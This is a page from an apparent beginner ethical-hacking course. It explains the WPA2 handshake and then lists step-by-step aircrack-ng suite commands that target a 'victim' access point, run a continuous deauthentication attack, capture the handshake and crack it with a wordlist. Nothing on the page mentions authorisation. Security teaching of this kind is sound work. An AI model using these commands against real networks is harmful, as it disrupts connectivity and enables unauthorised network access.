Hacking For Babies
  • Introduction
  • Ethical Hacking
  • Kali Linux
    • Why Kali ?
    • Virtual Machine
    • kali on Cloud
    • Bootable USB
    • Dual Boot Kali
    • Kali Nethunter
    • Most Used Linux Commands
    • Additional Information
  • Network Basics
    • What is the internet ?
    • Key Words
    • Network devices
    • LAN / WAN
    • VPN (Virtual Private Network)
    • Deep and Dark Web
    • Networking Commands
    • Additional Information
  • OSINT
    • Maltego
    • Google Advanced Search Operators
    • OSINT Username Finder
    • Social Media OSINT
    • Reverse Image Search
    • Protect yourself from OSINT
    • Additional Information
  • Digital Forensics
  • Phishing Attacks
    • Temporary Numbers
    • GitHub Projects/Tools
    • Kali Pre-Installed Tools
    • Emails Tricks
    • How to secure yourself from phishing attacks
    • Additional Information
  • Hardware Attacks
    • Marketplaces and Websites
    • Keylogger
    • USB Killer
    • Ethernet Hacking Tools
    • Flipper Zero
    • Bad USB
  • HID Attacks
    • Classic Bad USB
    • Wireless Bad USB
    • Keystroke Injection Cable
    • Other Tools Using the Some Concept
    • Simple Ducky Script
    • Reverse Shell Ducky Script
    • Solution for Bad USB
  • Cryptography
    • What is Cryptography ?
    • Simple Cryptography Algorithms
    • Hash Algorithms
    • Symmetric / Asymmetric cryptography
    • RSA Cryptosystem
    • Quantum Computers VS Cryptography
    • Steganography: Hiding Data in music and photos
    • Additional Information
  • Password Attacks
    • Dictionary Attacks
    • Brute Force Attacks
    • Hashcat
    • Hydra
    • Other Password Attacks Tools
    • Protect your Self against Password Attacks
  • Wireless Attacks
    • RFID / NFC Attacks
    • Bluetooth Attacks
    • MouseJack Attacks
    • IR Replay Attacks
    • RF Attacks
    • Wifi Attacks
  • WIFI Attacks
    • Wireless Adapters
    • Basic WIFI Manipulation
    • Deauthentication Attack
    • WIFI Cracking
    • MITM Attacks
    • Prebuild WIFI Pentesting Tools
    • WIFI Attack Solution
    • Additional Information
  • WIFI Cracking
    • WEP Cracking
    • WPS Attack
    • WPA Handshake Capture
    • PMKID Hash Capture
    • Hashcat Cracking
    • Wifite
    • Airgeddon
    • Fern WIFI Cracker
    • Protecting your Wi-Fi network from cracking
  • Coming Soon
Powered by GitBook
On this page
  • What is the WPA2 handshake
  • Steps to follow to capture and crack the WPA2 handshake
  • Other YouTube Tutorials
  1. WIFI Cracking

WPA Handshake Capture

What is the WPA2 handshake

The WPA2 handshake is a process that occurs when a client device wants to join a Wi-Fi network secured with WPA2 encryption. It involves the exchange of messages between the client device and the access point (AP) to establish a secure connection. During the handshake, the client device and AP authenticate each other's identities, negotiate encryption keys, and establish a secure communication channel. This process helps prevent unauthorized access to the network and ensures that data transmitted over the network is encrypted and protected. The WPA2 handshake is a crucial security measure in Wi-Fi networks and helps safeguard against unauthorized access and data interception.

Steps to follow to capture and crack the WPA2 handshake

  1. kill conflict in prosses of the WIFI

sudo airmon-ng check kill
  1. Start monitor mode

sudo airmon-ng start [interface]
  1. Get the Victim's MAC address and channel

sudo airodump-ng [interface]

you can display only the victim AP

sudo airodump-ng [interface] -d [victim mac adress]
  1. Now you should use two different

  • first window

sudo airodump-ng -w hack1 -c [victim channel number] --bssid [victim mac adress] [interface]
  • second window : deauth attack

sudo aireplay-ng --deauth 0 -a [victim mac adress] [interface]

then you should stop both windows bu just pressing Ctrl + C

  1. Use Wireshark to open hack1 file

wireshark hack1-01.cap

Filter Wireshark messages for EAPOL

  1. Stop monitor mode

sudo airmon-ng stop [interface]
  1. Crack file with Rockyou or other wordlist

aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

Make sure you have rockyou in text format (you can unzip file directly on Kali)

you can you any other word list to crack the file

If you can't crack the file using wordlist you can brute force it using Hashcat

for more details check:

in case no is connected to the WIFI we are obliged to use an PMKID Attack

Other YouTube Tutorials

You can check those YouTube Videos/Tutorials about WPA Handshake Capture:

PreviousWPS AttackNextPMKID Hash Capture

Last updated 1 year ago

created by

created by

created by

Hashcat Cracking
PMKID Hash Capture
This YouTube Video
David Bombal
This YouTube Video
Hak5
This YouTube Video
InfoSec Pat